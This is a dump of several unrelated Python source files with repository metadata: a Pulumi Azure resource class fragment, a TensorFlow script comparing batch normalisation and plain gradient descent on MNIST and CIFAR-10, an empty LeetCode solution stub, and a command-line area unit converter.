Get an existing DomainOwnershipIdentifier resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["ownership_id"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DomainOwnershipIdentifier(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> pulumi.Output[Optional[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | bpkgoud.noreply@github.com |
92133a5ef112f17025321f25820ce497167582b9 | aa2e2765185122be8f5cff48c7fbce999f02435a | /script/ModelAndTest.py | 8693a74848de0157f0c044d8058fc489eecb7761 | [] | no_license | Lightmann/BatchNormGD | ee904a944a757438040c9203163a2d108da556c0 | 22225684cc3525073ca8ecf4712fa4226f39743c | refs/heads/master | 2020-05-20T11:15:27.161145 | 2019-05-08T06:37:32 | 2019-05-08T06:37:32 | 185,545,206 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 30,708 | py | # coding: utf-8
# 2018-08-17
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
# save and load
import pickle # import cpickle as pickle
def data_save(data,filename):
f = open(filename, "wb") # *.dat
pickle.dump(data, f)
f.close()
def data_load(filename):
return pickle.load(open(filename, "rb"))
# # Model
class Model(object):
def __init__(self, **args):
""" Build some model here """
print(args)
def predict(inputs):
raise NotImplementedError
def loss():
raise NotImplementedError
def metrics():
raise NotImplementedError
def optimizer():
raise NotImplementedError
def train(dataset):
raise NotImplementedError
def set_tensorboard(self,logdir):
self.tensorboard_dir = logdir
# ## Model_mnist
class Model_mnist(Model):
name = 'mnist'
method = 'none'
#image_size = 28
image_channel = 1
#def __init__(self, **args):
def __init__(self, image_size=28, hidden_size=100, **args):
tf.reset_default_graph()
self.image_size = image_size
self.hidden_size = hidden_size
learning_rate = tf.placeholder(tf.float32, name='learning_rate')
learning_rate_abph = tf.placeholder(tf.float32, name='learning_rate_ab')
is_training = tf.placeholder(tf.bool, name='is_training')
#x = tf.placeholder(tf.float32, shape=[None, 784], name='x')
x = tf.placeholder(tf.float32, shape=[None, self.image_channel * self.image_size**2], name='x')
labels = tf.placeholder(tf.float32, shape=[None, 10], name='labels')
#x_image = tf.reshape(x, [-1, 28, 28, 1])
x_image = tf.reshape(x, [-1, self.image_size, self.image_size, self.image_channel])
self.x = x
self.labels = labels
self.learning_rate = learning_rate
self.learning_rate_abph = learning_rate_abph
self.learning_rate_ab = 0.1 # default
self.is_training = is_training
self.predict(x_image)
self.loss(labels)
self.metrics()
self.optimizer()
self.init = tf.global_variables_initializer()
self.saver = tf.train.Saver(max_to_keep=0)
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('accu', self.accuracy)
print('A model for %s is created using %s method.' %(self.name, self.method))
self.scaling = [] # add to test the scaling property
self.regamma = [] # add to test different value of gamma
def __del__(self):
print("__del__")
def predict(self, x_image):
raise NotImplementedError
def loss(self, labels):
y = self.y
self.labels = labels
#cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=logits))
cross_entropy = -tf.reduce_mean(tf.reduce_sum(labels * tf.log(y), reduction_indices=[1]),name="cross_entropy")
self.loss = cross_entropy
def metrics(self):
y = self.y
labels = self.labels
correct_prediction = tf.equal(tf.argmax(y, axis=1), tf.argmax(labels, axis=1), name='correct_prediction')
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32),name='accuracy')
self.accuracy = accuracy
def optimizer(self):
learning_rate = self.learning_rate
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print('extra_update_ops:\n',extra_update_ops)
with tf.control_dependencies(extra_update_ops):
self.training_op = optimizer.minimize(self.loss)
def set_scaling(self,weight_aug=1.0):
# a test
self.scaling = []
#print(tf.trainable_variables())
print('\n')
for w in tf.trainable_variables():
if 'gamma' in w.name or 'beta' in w.name:
print('not scaling:',w)
else:
print('scaling %g:' % weight_aug,w)
self.scaling.append( tf.assign(w, w*weight_aug) )
def set_gamma(self,gamma=1.0):
self.regamma = []
for w in tf.trainable_variables():
if 'gamma' in w.name:
print('set value %g:' % gamma,w)
self.regamma.append( tf.assign(w, gamma) )
def train(self, dataset, learning_rate = 1e-3, n_batch=100, max_step=1000):
#sess = tf.InteractiveSession()
with tf.Session() as sess:
sess.run(self.init)
sess.run(self.scaling) # test the scaling property
sess.run(self.regamma) # test the gamma value
plan_tag = '%s_lr%g_nb%d_it%d' % (self.method, learning_rate, n_batch, max_step)
print(plan_tag)
tensorboard_dir = self.tensorboard_dir
saver = self.saver #.as_saver_def()
saver_path = tensorboard_dir + plan_tag + '_par/'
if not os.path.exists(tensorboard_dir):
os.makedirs(tensorboard_dir)
'''writer = tf.summary.FileWriter(tensorboard_dir + plan_tag + '_train')
writer_test = tf.summary.FileWriter(tensorboard_dir + plan_tag + '_test')
merged_summary = tf.summary.merge_all()
writer.add_graph(sess.graph)'''
# RuntimeError: Graph is finalized and cannot be modified.
sess.graph.finalize() # RuntimeError: Graph is finalized and cannot be modified.
value_history = []
for i in range(max_step+1):
xb,yb = dataset.train.next_batch(n_batch)
feed_dict_train = {self.x:xb, self.labels:yb, self.is_training:True,
self.learning_rate:learning_rate,
self.learning_rate_abph:self.learning_rate_ab}
sess.run(self.training_op, feed_dict=feed_dict_train)
if i%10 == 0:
try:
xt,yt = dataset.test.next_batch(n_batch)
feed_dict_test = {self.x:xt, self.labels:yt, self.is_training:False}
#train_loss, train_accu = sess.run((self.loss, self.accuracy),feed_dict=feed_dict_train)
#test_loss, test_accu = sess.run((self.loss,self.accuracy), feed_dict=feed_dict_test)
train_loss = sess.run(self.loss,feed_dict=feed_dict_train)
train_accu = sess.run(self.accuracy,feed_dict=feed_dict_train)
test_loss = sess.run(self.loss, feed_dict=feed_dict_test)
test_accu = sess.run(self.accuracy, feed_dict=feed_dict_test)
#value_history.append([train_loss, train_accu, test_loss, test_accu])
value_history.append([i,train_loss, train_accu, test_loss, test_accu])
print('%d : train_loss = %g, test_err = %g, train_accu = %g, test_accu = %g'
% (i,train_loss, test_loss, train_accu,test_accu))
'''s = sess.run(merged_summary, feed_dict=feed_dict_train)
writer.add_summary(s,i)
st = sess.run(merged_summary, feed_dict=feed_dict_test)
writer_test.add_summary(st,i)'''
#saver.save(sess, saver_path, global_step=i )
if train_loss != train_loss:
break
except:
break
saver.save(sess, saver_path, global_step=i )
self.datafile = tensorboard_dir + plan_tag+'.dat'
data_save(np.array(value_history),filename=self.datafile) # save
self.value_history = value_history
sess.close()
# # Model1 -- 2cnn + 2fc
class Model_mnist_gd(Model_mnist):
method = 'gd'
def predict(self, x_image):
with tf.variable_scope(self.method):
layer1 = tf.layers.conv2d(x_image, 32, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer1')
pool1 = tf.nn.max_pool(layer1, ksize=[1,2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
layer2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer2')
pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
flattened = tf.reshape(pool2, [-1, flat_shape])
fc1 = tf.layers.dense(flattened,1024, activation=tf.nn.relu, name='fc1')
logits = tf.layers.dense(fc1,10,activation=None, name='fc2')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model_mnist_bn(Model_mnist):
method = 'bn'
def predict(self, x_image):
with tf.variable_scope(self.method):
hidden1 = tf.layers.conv2d(x_image, 32, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=None, name='hidden1')
bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
layer1 = tf.nn.relu(bn1, name='layer1')
pool1 = tf.nn.max_pool(bn1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=None, name='hidden2')
bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
layer2 = tf.nn.relu(bn1)
pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
flattened = tf.reshape(pool2, [-1, flat_shape])
hidden3 = tf.layers.dense(flattened,1024,activation=None, name='fc1')
bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
fc1 = tf.nn.relu(bn3)
hidden4 = tf.layers.dense(fc1,10,activation=None, name='fc2')
logits = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model_mnist_bn_split(Model_mnist_bn):
method = 'bn_split'
def optimizer(self):
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
learning_rate_ab = self.learning_rate_abph
learning_rate = self.learning_rate
list0 = tf.trainable_variables()
list2 = tf.trainable_variables(scope='bn_split/bn')
list1 = list(set(list0)-set(list2))
print(list1,list2)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
#self.training_op = optimizer.minimize(self.loss)
self.training_op1 = optimizer.minimize(self.loss, var_list=list1)
optimizer2 = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
self.training_op2 = optimizer2.minimize(self.loss, var_list=list2)
self.training_op = (self.training_op1,self.training_op2)
# # Model2 -- 1fc -- one layer
class Model2_mnist_gd(Model_mnist):
method = 'gd'
def predict(self, x_image):
x = self.x # not use x_image
with tf.variable_scope(self.method):
#flattened = tf.reshape(x, [-1, 28*28])
flattened = tf.reshape(x, [-1, self.image_size*self.image_size])
logits = tf.layers.dense(flattened,10,activation=None, name='fc')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model2_mnist_bn(Model_mnist):
method = 'bn'
def predict(self, x_image):
x = self.x # not use x_image
with tf.variable_scope(self.method):
#flattened = tf.reshape(x, [-1, 28*28])
flattened = tf.reshape(x, [-1, self.image_size*self.image_size])
hidden = tf.layers.dense(flattened,10,activation=None, name='fc')
logits = tf.layers.batch_normalization(hidden,training=self.is_training, momentum=0.9, name='bn')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model2_mnist_bn_split(Model2_mnist_bn):
method = 'bn_split'
def optimizer(self):
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
learning_rate_ab = self.learning_rate_abph
learning_rate = self.learning_rate
list0 = tf.trainable_variables()
list2 = tf.trainable_variables(scope='bn_split/bn')
list1 = list(set(list0)-set(list2))
print(list1,list2)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
#self.training_op = optimizer.minimize(self.loss)
self.training_op1 = optimizer.minimize(self.loss, var_list=list1)
optimizer2 = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
self.training_op2 = optimizer2.minimize(self.loss, var_list=list2)
self.training_op = (self.training_op1,self.training_op2)
# # Model3 -- 2cnn(3) + 3fc
class Model3_mnist_gd(Model_mnist):
method = 'gd'
def predict(self, x_image):
with tf.variable_scope(self.method):
layer1 = tf.layers.conv2d(x_image, 32, kernel_size=[3,3],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer1')
pool1 = tf.nn.max_pool(layer1, ksize=[1,2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
layer2 = tf.layers.conv2d(pool1, 64, kernel_size=[3,3],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer2')
pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
flattened = tf.reshape(pool2, [-1, flat_shape])
fc1 = tf.layers.dense(flattened,512, activation=tf.nn.relu, name='fc1')
fc2 = tf.layers.dense(fc1,128, activation=tf.nn.relu, name='fc2')
logits = tf.layers.dense(fc2,10,activation=None, name='fc3')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model3_mnist_bn(Model_mnist):
method = 'bn'
def predict(self, x_image):
with tf.variable_scope(self.method):
hidden1 = tf.layers.conv2d(x_image, 32, kernel_size=[3,3],strides=[1,1],padding='SAME',
activation=None, name='hidden1')
bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
layer1 = tf.nn.relu(bn1, name='layer1')
pool1 = tf.nn.max_pool(bn1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[3,3],strides=[1,1],padding='SAME',
activation=None, name='hidden2')
bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
layer2 = tf.nn.relu(bn1)
pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
flattened = tf.reshape(pool2, [-1, flat_shape])
hidden3 = tf.layers.dense(flattened,512,activation=None, name='fc1')
bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
fc1 = tf.nn.relu(bn3)
hidden4 = tf.layers.dense(fc1,128,activation=None, name='fc2')
bn4 = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
fc2 = tf.nn.relu(bn4)
hidden5 = tf.layers.dense(fc2,10,activation=None, name='fc3')
logits = tf.layers.batch_normalization(hidden5,training=self.is_training, momentum=0.9, name='bn5')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model3_mnist_bn_split(Model3_mnist_bn):
method = 'bn_split'
def optimizer(self):
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
learning_rate_ab = self.learning_rate_abph
learning_rate = self.learning_rate
list0 = tf.trainable_variables()
list2 = tf.trainable_variables(scope='bn_split/bn')
list1 = list(set(list0)-set(list2))
print(list1,list2)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
#self.training_op = optimizer.minimize(self.loss)
self.training_op1 = optimizer.minimize(self.loss, var_list=list1)
optimizer2 = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
self.training_op2 = optimizer2.minimize(self.loss, var_list=list2)
self.training_op = (self.training_op1,self.training_op2)
# # Model4 -- 1fc -- one layer, quadratic
class Model4_mnist_gd(Model2_mnist_gd):
def loss(self, labels):
y = self.y
self.labels = labels
self.loss = tf.reduce_mean( (labels-y)**2,name="loss")
class Model4_mnist_bn(Model2_mnist_bn):
def loss(self, labels):
y = self.y
self.labels = labels
self.loss = tf.reduce_mean( (labels-y)**2,name="loss")
#class Model4_mnist_bn_split(Model2_mnist_bn)
class Model4_mnist_bn_split(Model2_mnist_bn_split):
def loss(self, labels):
y = self.y
self.labels = labels
self.loss = tf.reduce_mean( (labels-y)**2,name="loss")
# # Model5 -- 2fc -- one+one layer, quadratic
class Model5_mnist_gd(Model4_mnist_gd):
def predict(self, x_image):
x = self.x # not use x_image
with tf.variable_scope(self.method):
#flattened = tf.reshape(x, [-1, 28*28])
flattened = tf.reshape(x, [-1, self.image_size*self.image_size])
hidden = tf.layers.dense(flattened,self.hidden_size,activation=tf.nn.relu, name='fc1')
logits = tf.layers.dense(hidden,10,activation=None, name='fc')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model5_mnist_bn(Model4_mnist_bn):
def predict(self, x_image):
x = self.x # not use x_image
with tf.variable_scope(self.method):
#flattened = tf.reshape(x, [-1, 28*28])
flattened = tf.reshape(x, [-1, self.image_size*self.image_size])
hidden1 = tf.layers.dense(flattened,self.hidden_size,activation=None, name='fc1')
bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
layer1 = tf.nn.relu(bn1, name='layer1')
hidden2 = tf.layers.dense(layer1,10,activation=None, name='fc2')
logits = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
return
class Model5_mnist_bn_split(Model5_mnist_bn):
method = 'bn_split'
def optimizer(self):
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
learning_rate_ab = self.learning_rate_abph
learning_rate = self.learning_rate
list0 = tf.trainable_variables()
list2 = tf.trainable_variables(scope='bn_split/bn')
list1 = list(set(list0)-set(list2))
print(list1,list2)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
#self.training_op = optimizer.minimize(self.loss)
self.training_op1 = optimizer.minimize(self.loss, var_list=list1)
optimizer2 = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
self.training_op2 = optimizer2.minimize(self.loss, var_list=list2)
self.training_op = (self.training_op1,self.training_op2)
return
# # Model_cifar10
class Model_cifar10(Model_mnist):
image_size = 32
image_channel = 3
name = 'cifar10'
class Model_cifar10_gd(Model_cifar10):
method = 'gd'
def predict(self, x_image):
with tf.variable_scope(self.method):
layer1 = tf.layers.conv2d(x_image, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer1')
pool1 = tf.nn.max_pool(layer1, ksize=[1,3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
layer2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=tf.nn.relu, name='layer2')
pool2 = tf.nn.max_pool(layer2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 8*8*64
flattened = tf.reshape(pool2, [-1, flat_shape])
fc1 = tf.layers.dense(flattened,512, activation=tf.nn.relu, name='fc1')
fc2 = tf.layers.dense(fc1,128, activation=tf.nn.relu, name='fc2')
logits = tf.layers.dense(fc2,10,activation=None, name='fc3')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model_cifar10_bn(Model_cifar10):
method = 'bn'
def predict(self, x_image):
with tf.variable_scope(self.method):
hidden1 = tf.layers.conv2d(x_image, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=None, name='hidden1')
bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
layer1 = tf.nn.relu(bn1, name='layer1')
pool1 = tf.nn.max_pool(bn1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
activation=None, name='hidden2')
bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
layer2 = tf.nn.relu(bn1)
pool2 = tf.nn.max_pool(layer2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
flat_shape = pool2.get_shape()[1:4].num_elements() # 8*8*64
flattened = tf.reshape(pool2, [-1, flat_shape])
hidden3 = tf.layers.dense(flattened,512,activation=None, name='fc1')
bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
fc1 = tf.nn.relu(bn3)
hidden4 = tf.layers.dense(fc1,128,activation=None, name='fc2')
bn4 = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
fc2 = tf.nn.relu(bn4)
hidden5 = tf.layers.dense(fc2,10,activation=None, name='fc3')
logits = tf.layers.batch_normalization(hidden5,training=self.is_training, momentum=0.9, name='bn5')
tf.summary.histogram('logits', logits)
self.logits = logits
self.y = tf.nn.softmax(logits)
class Model_cifar10_bn_split(Model_cifar10_bn):
method = 'bn_split'
def optimizer(self):
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
learning_rate_ab = self.learning_rate_abph
learning_rate = self.learning_rate
list0 = tf.trainable_variables()
list2 = tf.trainable_variables(scope='bn_split/bn')
list1 = list(set(list0)-set(list2))
print(list1,list2)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
#self.training_op = optimizer.minimize(self.loss)
self.training_op1 = optimizer.minimize(self.loss, var_list=list1)
optimizer2 = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
self.training_op2 = optimizer2.minimize(self.loss, var_list=list2)
self.training_op = (self.training_op1,self.training_op2)
class Model_cifar10_adam(Model_cifar10_gd):
name = 'adam'
def optimizer(self):
learning_rate = self.learning_rate
with tf.name_scope("train"):
optimizer = tf.train.AdamOptimizer(learning_rate)
#optimizer = tf.train.GradientDescentOptimizer(learning_rate)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print(extra_update_ops)
with tf.control_dependencies(extra_update_ops):
self.training_op = optimizer.minimize(self.loss)
# # Test
class Test(object):
def test_lr(self, model, dataset,lr_list, n_batch=100,max_step=1000, logdir='../Results/'):
model.set_tensorboard(logdir)
value_history = []
datafiles = []
for learning_rate in lr_list:
model.train(dataset=dataset,
learning_rate=learning_rate,
n_batch=n_batch,max_step=max_step)
value_history.append(model.value_history)
datafiles.append(model.datafile)
self.lr_list = lr_list
self.value_history = value_history
self.datafiles = datafiles
print(datafiles)
def value_check(self):
n = len(self.value_history)
m = max([len(vh) for vh in self.value_history])
value_history = np.nan * np.ones([n,m,5])
for ni in range(n):
mi = len(self.value_history[ni])
value_history[ni,:mi,:] = np.array(self.value_history[ni])
self.value_history_np = value_history
def load_value_history(self):
pass
def plot_lr(self,step=10):
value_history = self.value_history_np
x = self.lr_list
#step = 10
plt.figure(figsize=[20,5])
plt.subplot(121)
plt.plot(x,value_history[:,step,1],'b-')
plt.plot(x,value_history[:,step,3],'r-')
#plt.xlim([0,10])
plt.xlabel('learning rate')
plt.ylabel('loss at step=%d'%step);
plt.legend(('train','test'))
plt.subplot(122)
plt.semilogx(x,value_history[:,step,2],'b-')
plt.plot(x,value_history[:,step,4],'r-')
#plt.xlim([0,10])
plt.xlabel('learning rate')
plt.ylabel('accuracy at step=%d'%step);
plt.legend(('train','test'))
#import numpy as np
import scipy as scipy
#from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("MNIST_data", one_hot=True)
def imresize(x,size): # resize one image such as 28*28 --> 20*20
xr = scipy.misc.imresize(x,size)
#return np.array(xr,dtype='float32')
return np.array(xr,dtype='float32') / 255.0
def imresize_mnist_batch(xb,size): # resize image batch
n_batch = len(xb)
size0 = [28,28]
xbr = np.zeros([n_batch,size[0]*size[1]])
for i in range(n_batch):
x = xb[i].reshape(size0)
xr = imresize(x,size)
xbr[i,:] = xr.reshape([1,size[0]*size[1]])
return xbr
class mnist_resized():
def __init__(self,mnist, trainORtest,size,**args):
self.trainORtest = trainORtest
self.size = size
func_next_batch = [mnist.train.next_batch, mnist.test.next_batch]
self.func = func_next_batch[trainORtest]
return
def next_batch(self,n_batch):
x,y = self.func(n_batch)
xr = imresize_mnist_batch(x,self.size)
#print('xr',xr.shape)
return xr,y
class dataset_mnist_resized():
def __init__(self, mnist, size, **args):
self.train = mnist_resized(mnist, 0,size)
self.test = mnist_resized(mnist, 1,size)
return
#dataset2 = dataset_mnist_resized(mnist, [22,22])
#xb,yb = dataset2.train.next_batch(3)
#xt,yt = dataset2.test.next_batch(4)
#xb.shape,yb.shape, xt.shape,yt.shape | [
"noreply@github.com"
] | Lightmann.noreply@github.com |
f8402862660ad7fbd0eaa5701600977ee84be1b3 | 3ef1689e0bc15c6928df73768a53fc831811a7cd | /2.add-two-numbers.py | f9ebe10af8d681949ace78d9113b832d94dbc384 | [] | no_license | liruochen1998/lc | 4b32d9ce05048858628ae6163cc0f3487223b666 | 8a04c6c53feaefed6376c70cf8063a300a3b85b0 | refs/heads/master | 2020-04-30T09:27:41.850579 | 2019-09-23T00:18:06 | 2019-09-23T00:18:06 | 176,747,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | #
# @lc app=leetcode id=2 lang=python
#
# [2] Add Two Numbers
#
# https://leetcode.com/problems/add-two-numbers/description/
#
# algorithms
# Medium (30.60%)
# Total Accepted: 795.2K
# Total Submissions: 2.6M
# Testcase Example: '[2,4,3]\n[5,6,4]'
#
# You are given two non-empty linked lists representing two non-negative
# integers. The digits are stored in reverse order and each of their nodes
# contain a single digit. Add the two numbers and return it as a linked list.
#
# You may assume the two numbers do not contain any leading zero, except the
# number 0 itself.
#
# Example:
#
#
# Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
# Output: 7 -> 0 -> 8
# Explanation: 342 + 465 = 807.
#
#
#
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
| [
"liruochenv@gmail.com"
] | liruochenv@gmail.com |
00609455e8b9cf838c4f51da7dbb1f2d844d980a | 37bdd47e37ba53bc856b90d2ed313ef6a9446321 | /main/AREA/area.py | 293ceda6e4fc572dffbce9709237b9b4851c01aa | [
"BSD-3-Clause"
] | permissive | TSG405/Unit-Converter | 07823a4be4a3d4314693473ce79c39edd65eb6c6 | 98bdedc8130614ef41ba775b67488fb93df4b2da | refs/heads/main | 2023-02-19T09:09:13.636394 | 2021-01-10T07:20:25 | 2021-01-10T07:20:25 | 322,889,559 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | # LOGICAL FUNCTION
def convert_SI(val, unit_in, unit_out):
# WITH BASE "SQUARE-METRES"...
SI = {'s-km':1000000, 's-mile':2590000, 's-m':1.0, 'hectare':10000, 's-yard': 0.836127, 's-ft': 0.092903, 's-in': 0.00064516, 'acre': 4046.86}
return (float(val * SI[unit_in] / SI[unit_out]))
# DRIVER FUNCTION
def temp():
tsg = ['s-km','s-mile','s-m','hectare','s-yard','s-ft','s-in','acre']
try:
print("\n\n-----------------------------------------------------------------------------")
print("LIST OF AVAILABLE UNITS OF AREA --")
print("* SQUARE-METERS -- s-m [CODE]")
print("* SQUARE-MILE -- s-mile [CODE]")
print("* SQUARE-KILOMETERS -- s-km [CODE]")
print("* HECTARES -- hectare [CODE]")
print("* SQUARE-YARDS -- s-yard [CODE]")
print("* SQUARE-FOOT -- s-ft [CODE]")
print("* SQUARE-INCH -- s-in [CODE]")
print("* ACRES -- acre [CODE]")
print("-----------------------------------------------------------------------------")
unit_in = input("\nFROM UNIT [CODE]-- \t")
if unit_in not in tsg:
print("ENTER THE CODE CORRECTLY!")
temp()
unit_out = input("TO UNIT [CODE]-- \t")
if unit_out not in tsg:
print("ENTER THE CODE CORRECTLY!")
temp()
amount = float(input("ENTER THE AMOUNT --\t"))
res = (convert_SI(amount, unit_in, unit_out))
print("\n------***------------***------")
print("{} {} = {} {}".format(amount, unit_in, res, unit_out))
print("------***------------***------\n")
except:
print("\nENTER THE AMOUNT CORRECTLY!!")
temp()
U = input("\nWANT TO TRY AGAIN? PLEASE TYPE -- [YES/Y OR NO/N] :--\t").lower()
if (U == 'yes' or U == 'y'):
temp()
else:
print("\n\n~THANK YOU! ")
exit()
temp()
@ CODED BY TSG405, 2021
| [
"noreply@github.com"
] | TSG405.noreply@github.com |
